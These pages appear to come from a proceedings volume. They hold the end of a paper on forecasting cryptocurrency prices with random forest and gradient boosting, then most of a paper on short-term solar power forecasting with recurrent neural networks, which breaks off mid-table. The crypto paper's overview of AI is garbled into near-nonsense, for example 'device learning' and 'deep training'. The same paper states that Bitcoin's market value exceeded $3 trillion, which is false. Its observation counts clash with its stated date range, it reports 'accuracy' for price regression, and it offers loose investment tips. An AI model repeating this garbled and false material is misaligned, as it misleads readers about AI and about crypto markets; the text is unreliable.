2 Related Work Early studies on bitcoin argued over whether it was a currency or purely a speculative asset, with most authors favouring the latter conclusion in light of the cryptocurrency’s high volatility, extraordinary short-term gains, and bubble-like price behaviour [3; 4; 7; 17]. The idea that cryptocurrencies are just speculative assets with no underlying value prompted research into potential correlations between macroeconomic and financial variables as well as other pricing factors related to investor behaviour [10]. Even for more conventional markets, it has been demonstrated that these factors are of utmost significance. For instance, [16] point out that Chinese companies with more attention from regular investors typically have a lower probability of stock price crashes. The market for cryptocurrencies has exploded during the past ten years [19]. For a brief period, Bitcoin’s market value exceeded $3 trillion, and it became widely accepted as a kind of legal tender [1]. A major turning point in the general use of blockchain technology was marked by these occurrences. Investors in cryptocurrencies currently have a wide range of choices, from Bitcoin and Ethereum to Dogecoin and Tether. Returns can be calculated in several different ways, and it can be challenging to predict returns for a volatile asset with wide price swings like a cryptocurrency [2]. There has been an increase in interest in cryptocurrency forecasting and profiteering using ML approaches over the past three years. Since the publication of [12], which, to the best of our knowledge, is one of the first studies to address this subject, Table 1 compiles numerous of those papers, presented in chronological order. The goal of this article is to contextualise and emphasise the key contributions of our study rather than
AI in Cryptocurrency
207
to present a comprehensive list of all papers that have been published in this area of the literature. See, for instance, [6] for a thorough analysis of cryptocurrency trading and numerous further references on ML trading. In the case of other cryptocurrencies, it was investigated whether bitcoin values are primarily influenced by public recognition [11] refer to it—measured by social media news, Google searches, Wikipedia views, Tweets, or comments in Facebook or specialist forums. To forecast changes in the daily values and transactions of bitcoin, Ethereum, and ripple, for instance, [9] investigated user comments and answers in online cryptocurrency groups. Their findings were encouraging, especially for bitcoin [15]. Hidden Markov models based on online social media indicators are used by [13] to create profitable trading methods for a variety of cryptocurrencies. Bitcoin, ripple, and litecoin are found to be unconnected to several economic and financial variables in both the time and frequency domains by [5]. In summary, these papers show that ML models outperform rival models like autoregressive integrated moving averages and exponential moving averages in terms of accuracy and improve the predictability of prices and returns of cryptocurrencies. This is true regardless of the period under analysis, data frequency, investment horizon, input set, type (classification or regression), and method. The performance of trading strategies developed using these ML models and the passive buy-and-hold (B&H) strategy is also contrasted in around half of the research surveyed (with and without trading costs). There is no clear winner in the race between various machine learning models, although it is generally agreed that ML-based strategies outperform passive ones in terms of overall cumulative return, volatility, and Sharpe ratio.
3 Artificial Intelligence and Machine Learning 3.1 Artificial Intelligence Artificial intelligence (AI) eliminates repetitive activities, freeing up a worker’s time for higher-level, more valuable work. Artificial intelligence (AI) is a cutting-edge technology that can deal with data that is too complicated for a person to manage. Artificial Intelligence may be used to automate tedious and repetitive marketing processes, enabling sales reps to concentrate on relationship development, lead nurturing, etc. Self-awareness – this is the greatest & most advanced standard of Artificial intelligence. The VP can design a successful strategy using AI data and recommendation systems. To sum it up, Artificial Intelligence looks prepared to function as upcoming for the globe. Artificial Intelligence would effortlessly manage on patients without real human direction. Artificial Intelligence have programs in several various other fields. Artificial intelligence (AI) is already being employed in almost every industry, offering any company that adopts AI a competitive advantage. Deep learning is a kind of device learning that runs inputs through the biologically inspired neural network architecture. Comprehending the improvement between Artificial intelligence, device reading, and deep training tends to be confusing. With Artificial Intelligence, devices execute features as for example discovering, preparation, reasoning and problem-solving.
208
A. I. Iliev and M. Panwar
3.2 Machine Learning A machine learning system builds prediction models based on historical data and predicts the results for fresh data whenever it receives it. The amount of data has an impact on the accuracy of the predicted output since the more data, the model has, the better it can predict the outcome. The necessity for machine learning in the sector is constantly growing. Computers are increasingly using machine learning, which enables them to draw lessons from their prior experiences. A variety of approaches are used by machine learning to build mathematical models and make predictions. Currently, the technique is employed for a wide range of purposes, including picture identification, speech recognition, email filtering, Facebook auto-tagging, recommender systems, and many more. 3.2.1 Machine Learning Algorithms a. Supervised Machine Learning Data that encompasses a predetermined label, such as spam/not-spam or a stock price at a specific time, it is known as training data. It must go through a training phase where it is asked to make predictions and is corrected when those predictions are untrue to produce a model. Until the model achieves the level of accuracy desired on the training data set, the training phase is repeated. There are other options, including Back Propagation Neural Networks and Logistic Regression. b. Unsupervised Machine Learning Unsupervised learning techniques are used when only the input variables exist and there are no corresponding output variables. To build models of the underlying data structure, they employ unlabeled training data. Data can be grouped using the clustering technique so that objects in one cluster are more like one another than they are to those in another. c. Reinforcement Machine Learning Reinforcement learning is a type of machine learning that enables agents to choose the best course of action based on their current state by training them to engage in actions that maximize rewards: Reinforcement learning systems frequently discover the best behaviors through trial and error. Imagine you’re playing a video game where you need to go to certain locations at certain times to earn points. A reinforcement algorithm playing that game would first move the character randomly, but over time and with plenty of trial and error, it would eventually figure out where and when to move the character to maximize its point total.
4 Methodology In this section, we will talk about our approach for prediction of cryptocurrency using proposed machine learning algorithms [18]. For this study, proposed workflow will look like it is shown in Fig. 1:
AI in Cryptocurrency
209
Fig. 1. Proposed flowchart
4.1 Data Collection Secondary data is chosen for this study and data is collected from in.investing.com which contains various stock price historical data for free. We have collected top 10 cryptocurrency data for this platform. Below tables show the name of selected cryptocurrency and date of the data taken from. Table 1. Cryptocurrencies S. No.
Cryptocurrency name
Data collected from date
Data collected till date
Number of observations
1
Binance
1/1/21
10/1/21
375
2
Cardano
1/1/21
10/1/21
375
3
Ethereum
1/1/21
10/1/21
375
4
Solana
1/1/21
10/1/21
372
5
Tether
1/1/21
10/1/21
375
6
USD coin
1/1/21
10/1/21
375
Collected dataset contains following features like Date, Open, High, Low, Volume. Date: Date of the observation, Open: Opening price on the given day, High: Highest price on the given day, Low: Lowest price on the given day, Price-Closing price on the given day, Volume: Volume of transactions on the given day.
210
A. I. Iliev and M. Panwar
4.2 Preliminary Data Analysis We will examine the distribution of our data before creating our final machine learning model. Since price is our target variable, we are plotting prices for each cryptocurrency, figuring out average prices after 30 and 2 days, and determining whether our data can accurately predict prices 30 or 2 days in the future. Visualization of each cryptocurrency price is displayed below: 4.2.1 Binance Plot
Fig. 2. Binance normal price vs monthly avg price
Fig. 3. Binance normal price vs 2 days avg price
Binance price randomness level is less as compared to the price of bitcoin (Fig. 2 and Fig. 3) and the price of Binance looks like increasing with time, but the current price of Binance is very less as compared to the price of bitcoin. If one wants to invest in cryptocurrency having less price value, then Binance can be a good choice. Binance monthly avg price doesn’t fit properly with normal price (Fig. 2), which means we cannot predict the 30 days future price of Binance, while if we roll a 2day average against the price of Binance (Fig. 3), we get the clear fit for this problem. Therefore, we can predict the Binance price after 2 days in the future.
AI in Cryptocurrency
211
4.2.2 Cardano Plot
Fig. 4. Cardano normal price vs monthly avg price
Fig. 5. Cardano normal price vs 2 days avg price
Cardano price was at its peak on September 21, (Fig. 4 and Fig. 5), but now Cardano price is decreasing also. So, it would be risky for investors to invest on Cardano. Prediction of Cardano is having the same issue as we saw in bitcoin and Binance. So, we can predict the price of Cardano after 2 days in the future as well. 4.2.3 Ethereum Plot From Fig. 6 and Fig. 7 we will predict the price of Ethereum just after two days in the future.
Fig. 6. Ethereum normal price vs monthly avg price
Price of Ethereum shows an increasing trend but after December 21, the price is decreasing. Price value of Ethereum is quite good and investors can try Ethereum if they want to invest. But before the suggestion, we will check the predicted price of Ethereum on 12th of January to check if the price of Ethereum is showing any variance i.e., either the price is increasing or decreasing from the price on 10th January.
212
A. I. Iliev and M. Panwar
Fig. 7. Ethereum normal price vs 2 days avg price
4.2.4 Solana Plot Here we will predict the price after two days for Solana – Fig. 8 and Fig. 9.
Fig. 8. Solana normal price vs monthly avg price
Fig. 9. Solana normal price vs 2 days avg price
4.2.5 Tether Plot Here we will predict the price after two days for Tether – Fig. 10 and Fig. 11. 4.2.6 USD Plot Here we will predict the price after two days for USD coin – Fig. 12 and Fig. 13. Thus, from the above plots, the price of cryptocurrency is changing randomly i.e., there’s no presence of trend in the price of each cryptocurrency. The monthly average price of cryptocurrencies doesn’t fit properly with normal price which means we cannot predict the 30 days future price of bitcoin, but if we roll a 2-day average against the price of bitcoin then we can predict the prices of each cryptocurrency after 2 days using machine learning.
AI in Cryptocurrency
213
Fig. 10. Tether normal price vs monthly avg price
Fig. 11. Tether normal price vs 2 days avg price
Fig. 12. USD coin normal price vs monthly avg price
Fig. 13. USD coin normal price vs 2 days avg price
4.3 Data Preprocessing Collected data is very raw in nature with which machine learning models cannot be applied therefore first data need to be processed. Data preprocessing is the process/methods of transforming data from unstructured data into structured data. Data preprocessing involves many techniques to transform the data. First, we will check if
214
A. I. Iliev and M. Panwar
there’s any null value present in the data which need to be fixed before applying any algorithms then we will normalize the data which will help to increase the accuracy of our machine learning models. 4.4 Model Preparation In this section, we will fit our machine learning models but before doing that first we will extract our dependent and independent variables because we are using supervised machine learning algorithm. Our dependent variable is “Price after two days” which can be obtained by shifting our price row by 2, and independent variables are Price, Open, High, Low and Ohlc. ohlc average =
Open + High + Low + Price 4
4.4.1 Algorithms Algorithms that are taken into consideration for this study are: random forest and gradient boosting, both algorithms are very powerful machine learning ensemble techniques. Random Forest The supervised learning technique known as random forest is typically used for classification and regression. Because it is composed of many decision tree algorithms and creates multiple decision trees depending on the classification samples, this approach is also known as a sort of ensemble learning. Regression trees are constructed using the samples’ averages. Although we may predict outcomes from both continuous (regression) and discrete (classification) data using these techniques, this algorithm performs better for classification issues than regression [8]. Understanding the ensemble technique is necessary to comprehend how random forest systems operate. In essence, ensemble combines two or more models. As a result, rather of using a single model, predictions are based on a group of models. Ensemble uses two different kinds of techniques: 1. Bagging Ensemble Learning: As was already said, several algorithms are considered in ensemble learning, but in the bagging method, the dataset is split into a few subsets before the same numerous algorithms are applied to each subset, and the final output data is decided by majority voting. Random forest employs this strategy for classification. 2. Boosting Ensemble Learning: Increasing ensemble learning: With this ensemble method, the final model produced provides the highest level of accuracy. This is accomplished by creating a sequential model after pairing weak and strong learners. A couple of these are ADA BOOST and XGBOOST. Now that we are familiar with the ensemble approaches, let’s examine the random forest method, which makes use of the first method, or bagging. The random first method considers the following steps, which are as follows:
AI in Cryptocurrency
215
Step1: The dataset is split into various subsets where each element is taken randomly. Step 2: A single algorithm is used to train each subset; in the case of a random forest, a decision tree is employed. Step 3: Each individual decision tree produces an output. Step 4: The final output is created by adding the results of each predictor together, identifying the largest result, and then averaging the regression results to determine the final output. Hyperparameter values taken into consideration: We selected 200 numbers of estimators at 42 random states for random forest algorithm. Gradient Boosting Gradient boosting is a very powerful algorithm of machine learning. In gradient boosting, many weak algorithms are combined to form a strong algorithm. Gradient boosting can be optimized by changing its learning rate. In this algorithm, we will check our model accuracy with multiple numbers of different learning rates and among those learning rates, we will find the best model for our problem. Hyperparameter values taken into consideration: Random state = 0, n_estimators = 100.
5 Results We achieved positive results on test data after training the data. The Solana cryptocurrency has the maximum accuracy, at 98.14%, while the USD coin and Tether cryptocurrency have the lowest accuracy, as their prices fluctuate erratically (see Table 2). Table 2. Accuracy score of algorithms on each cryptocurrency S. No.
Cryptocurrency name
Random forest accuracy
Gradient boosting accuracy
Learning rate
1
Binance
96.56%
96.85%
0.05
2
Cardano
94.88%
95.11%
0.05
3
Ethereum
96.61%
96.60%
0.05
4
Solana
98.07%
98.14%
0.1
5
Tether
38.00%
12.35%
0.05
6
USD coin
59.00%
14.80%
0.05
Since we last observed the price of each cryptocurrency on January 10th, we are predicting its price for January 12th and comparing it to the actual price of each coin (see Table 3).
216
A. I. Iliev and M. Panwar Table 3. Predicted results
S. No.
Cryptocurrency name
Prediction of price on Jan.12th using random forest
Prediction of price on Jan.12th using gradients boosting
Actual price on Jan.12th
1
Binance
435.50
429.70
487.01
2
Cardano
1.20
1.20
1.31
3
Ethereum
3142.00
3131.40
3370.89
4
Solana
141.70
141.20
151.43
5
Tether
1.00
1.00
1.00
6
USD coin
1.00
1.00
0.99
6 Conclusions and Future Work In this study, we suggested the idea of cryptocurrencies and how it helps investors to gain money while taking loss risk into account. We proposed a prediction model employing artificial intelligence (AI) and machine learning, with which we are projecting the prices of the six cryptocurrencies for the next two days to lower the risk of loss. However, to discover the optimal algorithm for predicting the performance of these six cryptocurrencies, we applied two ensemble machine learning algorithms. The results show that both algorithms perform well with most cryptocurrencies, except for Tether and USD coin (whose prices changed erratically). The performance metric we used for this study was accuracy score, with which we calculated the accuracy of algorithms and discovered that both algorithms perform well (about accuracy > 95%) for the cryptocurrencies Solana, Binance, and Ethereum. In future, deep learning models like ANN, LSTM can be used to train the model to achieve better results which can be again optimized using optimization techniques like particle swarm optimization, generating algorithms etc. which are part of evolutionary algorithms.
References 1. AF, B. The inefficiency of bitcoin revisited: a dynamic approach. Econ. Lett. 161, 1–4 (2017) 2. Anon. Top 10 Cryptocurrencies to Bet on for Good Growth in Feb 2022 (2022). https://www. analyticsinsight.net/top-10-cryptocurrencies-to-bet-on-for-good-growth-in-feb-2022/ 3. Cheah, E.T., Fry, J.: Speculative bubbles in bitcoin markets? an empirical investigation into the fundamental value of Bitcoin. Econ Lett 130, 32–36 (2015) 4. Cheung, A., Roca, E.: Crypto-currency bubbles: an application of the Phillips-Shi-Yu Yu. methodology on Mt.Gox Bitcoin prices. Appl. Econ. 47(23), 2348–2358 (2015) 5. Corbet, S., Meegan, A.: Exploring the dynamic relationships between cryptocurrencies and other financial assets. Econ. Lett. 165, 28–34 (2018) 6. Fang, F., Carmine, V.: Cryptocurrency trading: a comprehensive survey. Preprint arXiv:2003. 11352 (2020)
AI in Cryptocurrency
217
7. Dwyer, G.P.: The economics of Bitcoin and similar private digital currencies. J. Financ. Stab. 17, 81–91 (2015) 8. Borges, D.L., Kaestner, C.A.A. (eds.): SBIA 1996. LNCS, vol. 1159. Springer, Heidelberg (1996). https://doi.org/10.1007/3-540-61859-7 9. Kim, Y.B., Kim, J.H.: Predicting fluctuations in cryptocurrency transactions based on user comments and replies. PLoS One 11(8), e0161197 (2016) 10. Böhme, R., Christin, N., Edelman, B., Moore, T.: Bitcoin: economics, technology, and governance. J. Econ. Perspect. (JEP) 29(2), 213–238 (2015) 11. Li, X., Wang, C.A.: The technology and economic determinants of cryptocurrency exchange rates: the case of Bitcoin. Decis. Support Syst. 95, 49–60 (2017) 12. Madan, I, Saluja, S.: Automated bitcoin trading via machine learning algorithms (2019). http://cs229.stanford.edu/proj2014/Isaac%20Madan,20 13. Phillips, R.C., Gorse, D.: Redicting cryptocurrency price bubbles using social media data and epidemic modelling. In: 2017 IEEE Symposium Series on Computational Intelligence (SSCI), pp. 1–7. https://doi.org/10.1109/SSCI.2017.8280809 14. Kaur, A., Nayyar, A.: Blockchain a Path to the Future Cryptocurrencies and Blockchain Technology Applications. John Wiley & Sons, Ltd (2020) 15. Tiwari, A.K., Jana, R.K.: Informational efficiency of Bitcoin—an extension. Econ. Lett. 163, 106–109 (2018) 16. Wen, F., Xu, L.: Retail investor attention and stock price crash risk: evidence from China. Int. Rev. Financ. Anal. 65, 101376 (2019) 17. Yermack, D.: Is Bitcoin a Real Currency? An Economic Appraisal. Springer, Berlin (2015) 18. Catania, L., Grassi, S., Ravazzolo, F.: Predicting the volatility of cryptocurrency time-series. In: Corazza, M., Durbán, M., Grané, A., Perna, C., Sibillo, M. (eds.) Mathematical and Statistical Methods for Actuarial Sciences and Finance, pp. 203–207. Springer, Cham (2018). https://doi.org/10.1007/978-3-319-89824-7_37 19. Tran, V.L., Leirvik, T.: Efficiency in the markets of crypto-currencies. Finance Res. Lett. 35, 101382 (2020)
Short Term Solar Power Forecasting Using Deep Neural Networks Sana Mohsin Babbar(B) and Lau Chee Yong School of Computer, Engineering and Technology, Asia Pacific University of Technology and Innovation (APU), 57000 Kuala Lumpur, Malaysia [email protected], [email protected]
Abstract. An enigmatic challenge has been seen in recent years for the intermittency and unpredictable nature of solar power energy. It is imperative to mitigate the sporadic behavior of solar energy resources for the PV system generation’s future prospect. For optimization of grid control and economic dispatch of Energy, forecasting ensures an important role. This paper presents a model which forecasts the short-term solar power ranging to 6 h ahead using recurrent neural network (RNN). Recurrent neural networks are the superlative type among all other neural networks. This study shows an extensive review of implementing recurrent neural networks for solar power generation prediction. Simulations and results show that the proposed methodology has outperformed well. The data of seven months was chosen for the training purpose, which reduces the RMSE from 47 to 30.1, MAE from 56 to 39, and most importantly MAPE from 18 to 11% on the whole. This research also reveals that good accuracy and efficacy is attained by the calibration of solar irradiance as well, which manifests the plausibility and effectiveness of the proposed model. Keywords: PV system generation · Recurrent neural network (RNN) · Short-term solar power forecasting
1 Introduction Solar Energy is one of the most widely and popular used sources among all other renewable sources. The concept of ‘Green Energy’ has been successfully held due to its extensive use mostly in tropical areas where solar irradiance is maximum [1]. It also helps to mitigate the emission of carbon. Around the globe, the usage of solar Energy has been this era, almost every large scale companies use PV solar systems to reduce the pollution and emission of carbon due to its environmentally friendly nature [2]. Although, it is difficult to manage the variation and intermittency in solar Energy produced. For this reason, predictive tools are used for having the controllability and better accuracy [3]. Forecasting or prediction of solar power generation plays a vital role in the smart grid [4]. There are generous perks and benefits of forecasting solar power generation based on the time horizon. Firstly, the forecast is present for the energy imbalance market (EIM). Secondly, it was also stated that the probability of an energy imbalance could be omitted by 19.65% using forecasting methods [5]. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 218–232, 2023. https://doi.org/10.1007/978-3-031-28073-3_15
Short Term Solar Power Forecasting Using Deep Neural Networks
219
Furthermore, by past research, it was observed that forecasts could also reduce the operational costs for the economic sustainability of any state. In [6], an electric vehicle (EV) charge-discharge management framework has been proposed for the better exploration of PV output to the smart grid by trading the information about home energy management systems (HEMS) and grid energy management systems (GEMS). The advantages of solar Energy have been popularly stated in almost every research regarding renewable energies. PV arrays produce no pollution while installing as it is an environmental-friendly system. Moreover, the PV power plants have minimal expenditure on maintenance and the operation cost is also low [7]. Constructive and effective planning for installing the PV solar plant leads to better power utility. Particularly forecasting methods should be planned according to the PV planting and procedures [8]. Hence, for avoiding any inconvenience and intermittency in solar Energy, efficacious forecasting models are the state of the art worldwide. Forecasting plays an important role in finding out the solutions to renewable energy related problems. Basically it’s a contribution to the energy sector. With the management perspective, energy management systems (EMS) using forecast mechanisms ensures the clean energy at high efficiency.
2 Literature Review In the past few years, forecasting and prediction of solar power generation have gained research attention. For any reason, the prediction methods, particularly for the PV prediction, are mainly classified into three classes: a physical method, statistical method, and artificial intelligence techniques. The physical models are the models that predict data through different models i.e., Model output statistics (MOS), Numerical weather prediction (NWP), and other geological models. They are meant to measure or obtain meteorological data with precision. However, it needs fine calibration and precision to deal with operating the models. On the other hand, statistical models are the one which is data-managed approaches. They mostly deal with the historical data sets and detects the error minimization [9]. Concurrently, the models based on artificial intelligence techniques are adequate tools for PV and wind prediction. The best feature of AI techniques is that they can easily deal with non-linear features [10]. In recent and in the past research, the focus on AI and machine learning approaches for forecasting purposes has been at the peak. Different linear and models have been implemented on the data sets formed by the physical and statistical models. In [11], the study has shown that for massive and complicated computation neural networks with a hybrid approach can be proved as the best predictive tool. A model was established in 2017 using an artificial neural network (ANN) and analog ensembles (AnEn) for short term PV power forecasting. Results and discussions showed that a combination of both techniques could yield the best results. It was also observed that in 2015 in China, which has a large renewable energy reservoir, a study was conducted for forecasting one day ahead of PV power output with four different variables using support vector machines (SVM). Simulations and facts showed that the proposed SVM model is effective and promising for PV power output [12]. An improved and accurate PV power forecasting model is proposed using deep LSTM-RNN (Long short term memory-Recurrent Neural Network). In this study, hourly data sets have been
220
S. M. Babbar and L. C. Yong
used for one year. LSTM is used for its extensive recurrent architecture and memory unit. As compared to other techniques and models, it was observed that LSTM-RNN is minimizing the errors at its best [13]. Extensive and detailed research is conducted recently in 2020. The researchers have culminated in the review from past years on solar power forecasting using artificial neural networks in the study. Furthermore, it was also observed by the brief research that forecasting plays a crucial role in economic dispatch and optimization of solar Energy into the smart grid. Therefore, forecasting and prediction algorithms must be implemented. In this stance, the review has proved that neural networking is the hallmark in PV power forecasting [14]. Comparative analysis was made to observe the efficacy of RNN. In 2018, a research was conducted with the multiple time horizon within the domain of short term solar forecasting using RNN. It was found by the results that only 4 h head forecasting was done and the RMSE obtained was between 20 to 40% [15]. On the other hand, this paper comprises the six hour ahead prediction and flaunts 30% of the RMSE and good accuracy under the MAPE criterion. This research aims to predict solar power generation by using RNN with the assistance of the Levenberg-Marquardt training model [16]. The key objective and the intention behind this paper are to compare the PV power output with the persistence model to see the predictive model’s performance. In short-term power forecasting, the persistence model is chosen as a comparative model for checking the precision [17]. In the literature review, it was observed that RNN with any training model chosen shows good accuracy and precision. RNN contains the unique feature of memorizing each information about the data set. It always proved to be useful for prediction due to its remembrance of previous inputs as well [18].
3 Deep Neural Network Deep Neural Networks (DNN) machine learning approaches have been adopted widely over the past few years. It can extract data from several kinds of data sets such as audio, video, images, matrix and arrays, etc. Numerous researches have been conducted in the area of deep learning, recurrent neural networks are one of them [19]. RNN’s are mostly used in Natural Language Processing (NLP) as they are specialized in processing sequences and large data sets. The captivating feature of RNN is that the variable length does not get compromise as both inputs and outputs. RNN is a special type of feedforward neural network which commonly deals with multiple layers and parameters. It is mainly designed and chosen for its multiple parameter feature. The architecture of RNN is very saturated and rich as it contains back-propagation function. In the literature review [20], different types of recurrent neural networks are discussed i.e., infinite impulse neural network, Elman recurrent neural network, diagonal recurrent neural network, and local activation feedback multilayer network. Figure 1 shows the basic layout and architecture of recurrent neural networks works.
Short Term Solar Power Forecasting Using Deep Neural Networks
221
Fig. 1. Basic architecture of RNN.
The Basic Formula for the RNN shows the working of the network in Eq. 1 and 2 below. This equation describes that h(t) is a hidden state of function f. Where h(t-1) is the previous hidden state, x(t) is the current input, and θ denotes the parameters chosen. The system typically figures out h(t) as a past summary of the past sequence input up to time interval t. Furthermore, for having an output, y(t) yields as output by taking the product of weights with the hidden states and denotes the biases. h(t) = f (h(t − 1), x(t); θ )
(1)
y(t) = why h(t) + by
(2)
For deep analysis in the hidden states, Fig. 2 demonstrates how the hidden layer is connected to the previous layer [21]. While Fig. 3 shows the n-number of inputs and outputs.
Fig. 2. One fully connected layer.
On the other hand, Long term short memory (LSTM) has also been used in ample of application of prediction and forecasting. By the research, it has been observed that LSTM works more effectively as compared to RNN. While in this research, LSTM did not bring efficacy with precision as RNN does.
222
S. M. Babbar and L. C. Yong
Fig. 3. Many to many type of RNN.
LSTM is type of RNN with few distinct features. This is also used in speech recognition, image processing and classification as well. Most of the time, LSTM are used in sentiment analysis, video analysis and language modelling. With comparison to RNN, LSTM’s architecture contains bunch of gates as shown in Fig. 4. The mathematical expression is illustrated below in Eq. 3, 4 and 5 respectively.
Fig. 4. Architecture of LSTM.
it = σ (wi ht−1 , xt + bi )
(3)
ft = σ (wf ht−1 , xt + bf )
(4)
Ot = σ (wo ht−1 , xt + bo )
(5)
where it represents the input gate, f t is forget while ot shows the output gate. While σ represents the sigmoid function, ht−1 are the hidden states, w shows the weights and b depicts the biases in all gates. The major difference between RNN and LSTM is the memory feature. LSTM has long term dependency leaning process. As discussed above that LSTM are mainly used for speech and vide analysis, they did not perform well. Due to the data type, LSTM gave the output in a matrix form with negative values. The negative points for prediction purpose are not encouraged and hard to analyze the accuracy.
Short Term Solar Power Forecasting Using Deep Neural Networks
223
4 Proposed Methodology Due to the high rate of intermittency and variability in the weather conditions, RNN is chosen as a predictive tool for this study. The methodology of this research has been divided into a few steps as shown in the Fig. 5. Firstly the input parameters were selected from the data set. Solar irradiance, module temperature, and solar power are taken as input as shown in Fig. 5. The RNN model has multiple steps of featuring the input, and the current step input of the hidden layer also includes the state of the previous step hidden layer as shown in Eq. 1 and 2. The next browsing step is to pre-process the data with in-depth analysis. The data is sifted according to the high solar energy produced during the day time. Mostly, the higher penetration of sun rays is during the period from 8:30 AM to 5:30 PM. Furthermore, the most important and trivial factor is solar irradiance [22]. The information about solar irradiance is very much essential for predicting the future for generating PV power. Mostly in the past research, solar irradiance is taken from the data set above 300 W/m2 . After done with the pre-processing of the data, the establishment of a model is a key step. RNN model has been designed with hit and trial rules. The number of hidden layers in neural networks is always decided on the hit and trial rule. The data set is trained from 10 to 50 layers and later is analyzed that how many layers are giving accurate results. In this study, 30 hidden layers are chosen between the input and the output layers.
Fig. 5. Flow chart of the proposed methodology.
224
S. M. Babbar and L. C. Yong
For the brief analysis of the data, the trend between the input parameter before training has been observed as shown in Fig. 6. The trend shows that solar power and irradiance are almost directly proportional to each other, but module temperature remains constant all day. The readings are taken for the entire month of July 2019.
Fig. 6. Trend between input parameters.
The trends between target and all input features have also been catered to as the training target is essential as shown in Fig. 7. Supervised machine learning approaches need a target to kick-start the simulation. Target acts as a plant between the input and the output layer. Employing a target is an essential part of any supervised machine learning model as it feeds data for calculating the prediction. In short, it brings accuracy to the results. Figure 8 shows the trend between all the input parameters individually.
Fig. 7. Trend of input parameters with the target.
The division of the data set is built-in with a percentage of 70 to 30%. The 70% of the data is allocated to the training while 15% to the validation and the rest 15% to the testing, as demonstrated in Fig. 8. Network topologies of RNN model is illustrated in Table 1.
Short Term Solar Power Forecasting Using Deep Neural Networks
225
Table 1. Network topologies used in RNN Arguments
Values
Layerdelays
1:5
Hiddenlayers
30
Trainfunction
Trainlm
No of hidden neurons
12283
Batch size
12283 × 3
Fig. 8. Division of data set.
Endogenously, after the successive training of the RNN model. The accuracy is calculated with the help of quantifying measures. In this paper, RMSE (Root Mean Square Error), MAE (Mean Absolute Error), and MAPE (Mean Absolute Percentage Error) are chosen best for efficacy, which is expressed below in Eq. 6, 7, and 8 [23]. N 2 i=1 (y − y ) (6) RMSE = N n i=0 y − y MAE = (7) N 1 n y − y × 100 (8) MAPE = i=0 y N where y = actual data and y = predicted data. As it is trivially observed in nature that solar energy is variable in conditions. There are no hard and fast conditions on the sun’s intensity. Weather climates are intermittent and can be changed anytime. The variation in solar power generation was also observed in this study to examine the behavior and trend with respect to the time. It was analyzed that maximum solar energy was discerned between the ranges from almost 8:30 in the morning from 5:30 in the evening. The trend is shown below in Fig. 11 below. It is shown clearly that how sprightly solar power is increasing and decreasing concerning time and weather conditions. Each day shows different fluctuations and variations according to the solar irradiance. For the comparison purpose, LSTM was chosen as a comparative model with RNN. By the output it was observed that, LSTM is not suitable model for forecasting the solar power for array kind of data set. The output was obtained in negative points, which is
226
S. M. Babbar and L. C. Yong
no need for this forecasting purpose. The output gained from the LSTM model is shown below in Fig. 9.
Fig. 9. Solar power (MW) characteristic using LSTM.
Predicted solar power obtained from LSTM is showing distinct behavior as compare to the RNN model. The domain of the predicted output is generated in the form of 3 × 3 matrix, which includes negative values as well. Prediction cannot be held in negative values. It does not give any concrete information or implies that model is dealing with the outliers. Concrete observations can be made by comparing the LSTM’s output that LSTM model is not suitable for this kind of data set used in this research. As the data is real time data with thousands of time steps with per minute resolution, the output according to the targeted output has been compressed in the form of matrix and showing no observations as shown in Fig. 10. It shows the trend of solar power characteristic among seven days. The output also reveals that solar power forecasting is bit challenging for LSTM as this model is best known for image processing, speech and vide recognition respectively.
Fig. 10. Trend of solar power among seven days.
5 Results and Discussion In this study, the results are quantified through RMSE (Root Mean Square Root) and MAE (Mean Absolute Error). Solar power, solar irradiance, and module temperature are
Short Term Solar Power Forecasting Using Deep Neural Networks
227
taken as input, while the target contains solar power for having the desired output. Due to the vast data set and training time constraints, the results are shown and discussed in the months. After hard bargaining and several hit and trials, the output depicts low accuracy errors. Figure 11 shows the output versus target trend for the RNN model. The trend is shown on the test indices, which are 15% of the while data. The results show a strong trend between target and output, and the model is minimizing the error. In Table 2, the minimization of errors has been shown briefly in terms of every month. As it is evident from the quantifying measures that RMSE is decreasing from 57.50 to 31.38 during February. The inclination in percentage MAPE almost fulfills the criteria of good accuracy [24, 25]. In the regime of good accuracy, it is stated that MAPE should be around 10%. In this study, the succession of reduced percentage MAPE has been shown with the persistence model’s comparison. Furthermore, a significant reduction in the MAE is also observed. In short term solar power prediction, persistence model is said to be benchmark for comparing the predicting output. Persistence model is actually an assumption that the time of the forecast will not change. The comparison of predicted solar power is made at the zeroth hour. It predominantly uses the previous day data as a forecast. The mathematical expression of persistence model is expressed below in Eq. 9. y(t − 1) = y(t + 1) + y
(9)
where y(t-1) is previous time steps while y(t + 1) is expected outcome.
Fig. 11. Solar power generation prediction characteristic.
Regression analysis is done to see the data set’s behavior, whether it best fits the model or not. It describes the relationship between the predictor and the response. In Fig. 12, the data points are fitting to the model and reducing the error showing the minimum training error. Furthermore, in Fig. 13, the performance of the training model has been shown at epoch 85. It briefly describes that model is training at its best by giving the minimum mean squared error (MSE). While on the other hand, Fig. 14 and Table 2 shows the results from quantifying measures from August 2019 to March 2020. As stated in the aforementioned methods, solar energy is intermittent and variant, so the variation in errors also occurs every month. However, the error minimization between response and the predictor is almost the same. Therefore, in Fig. 15 the final RMSE, MAE and MAPE
228
S. M. Babbar and L. C. Yong
Fig. 12. Regression analysis after successful training.
Fig. 13. Performance plot obtained after training.
are compared with the persistence model. The histogram clearly shows that the RNN model has performed well and reduced the errors compared to the persistence model. While on the other hand, LSTM has also been chosen to compare the results obtained from RNN. When encountering the quantifying measures, results from LSTM model cannot be computed. Due to the domain of output matrix, it is barely hard to calculate RMSE, MAE and MAPE. By the results and discussions, it is noteworthy that RNN seems to be a promising model for predicting solar power generation. It works well for the time series and continuous data. It can reduce the errors at its best. According to the percentage MAPE criterion, when the forecasting estimation appears to be greater than 10% and less than 20%, it falls under the category of good accuracy [26]. However, in this paper, RNN shows good accuracy and fulfilling the percentage MAPE estimation.
Short Term Solar Power Forecasting Using Deep Neural Networks
Fig. 14. Reduction of errors from Aug 2019 to Mar 2020.
Table 2. Quantifying measures. 2019–2020
Errors
Persistence
RNN
Aug
RMSE MAE MAPE
46.50 55.75 17.52
30.19 37.40 11.29
Sep
RMSE MAE MAPE
40.52 48.44 14.52
31.54 39.22 11.97
Oct
RMSE MAE MAPE
47.04 54.97 16.88
31.47 39.18 11.83
Nov
RMSE MAE MAPE
49.05 60.52 18.03
30.8 38.2 11.59
Dec
RMSE MAE MAPE
47.4 56.70 17.50
31.39 39.5 11.88
